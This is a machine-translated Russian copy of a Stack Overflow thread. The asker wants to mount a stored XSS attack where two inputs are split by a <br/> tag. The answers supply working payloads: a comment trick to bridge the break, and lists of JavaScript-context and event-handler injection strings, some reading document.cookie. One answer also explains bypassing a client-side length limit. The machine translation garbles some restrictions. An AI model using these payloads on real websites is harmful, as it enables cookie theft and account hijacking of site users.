1. дома
  2. Вопрос и ответ
  3. XSS с <script> следуют <br/>

XSS с <script> следуют <br/>

2016-09-20 5 views
-2

Как вы выполнить атаку XSS с этими ограничениями:XSS с <script> следуют <br/>

[input 1] <br/> [input 2]

вход 1 имеет следующие ограничения: - только 10 символов - Unsanitized

Вход 2 имеет следующие ограничения: - «<», «>», «&» дезинфицированы - никаких других ограничений

Кроме того, веб-страница допускает постоянный ввод, но как только я открываю тег, я не могу выполнять дополнительные входы.

Я попытался сделать:

<script> <br/> alert(document.cookie)

Но это, кажется, не работает, по-видимому, из-за бр теге там. Любые мысли о том, как я должен действовать?

источник

2016-09-20 Shaun Lee

+0

Интересно, почему люди отказались от этого. На этот вопрос можно ответить. –

ответ

0

Например: <script>/* <br/> */ alert(1); /*

источник

2016-09-20 08:14:56

+0

Это не дает ответа на вопрос. Чтобы критиковать или просить разъяснения у автора, оставьте комментарий ниже их сообщения. - [Из обзора] (/ review/low-quality-posts/13730370) – Liam

+0

@ Liam это действительно дает ответ на вопрос. –

+1

Кто-то отметил это как не ответ (а не я). Он был отправлен в очередь просмотра, где я (и другие) [просмотрел его] (http://stackoverflow.com/review/low-quality-posts/13730370). Для меня этот ответ плохо объяснен и читается как комментарий. Если вы добавите более подробную информацию, вы можете избежать ее удаления. Мое голосование передается сейчас, и я не могу его отменить, но для ответа на удаление требуется несколько голосов. Поэтому, если вы правильно ее исправите, вы можете избежать удаления. Просто повторите попытку, я не могу больше изменить этот процесс – Liam

1

Вы сказали:

Input 1 имеет следующие ограничения: - только 10 символов - Unsanitized

Если значение этого входа просто отражается в на странице (без элементов управления максимальной длины на стороне сервера), вы можете использовать инструменты разработчика вашего браузера, чтобы увеличить значение maxlength для ввода, а затем введите нужную полезную нагрузку.

И тогда вы сказали:

Input 2 имеет следующие ограничения: - "<", ">", "&" не продезинфицировать - Никаких других ограничений

Теперь это зависит от где отражается значение этого входа:

Если значение параметра ввода отражено в Javascript, вы можете попробовать:

";alert('XSS');// 
");alert(document.cookie); 
; window.open(www.google.com); 
';alert(String.fromCharCode(88,83,83))//

Если значение параметра Input отражается во входном теге HTML или в другой HTML-код, вы можете попробовать:

1? onmouseover=alert("xss"); " 
"onload='confirm("test XSS")’ 
" onload=window.open(www.google.com) 
" onload='javascript:alert(1)’

XSS зависит от того, где он отражается !!! Вы тоже должны использовать свой мозг.

источник

2016-09-21 16:11:59 stfsngue

 Смежные вопросы

  • Нет связанных вопросов^_^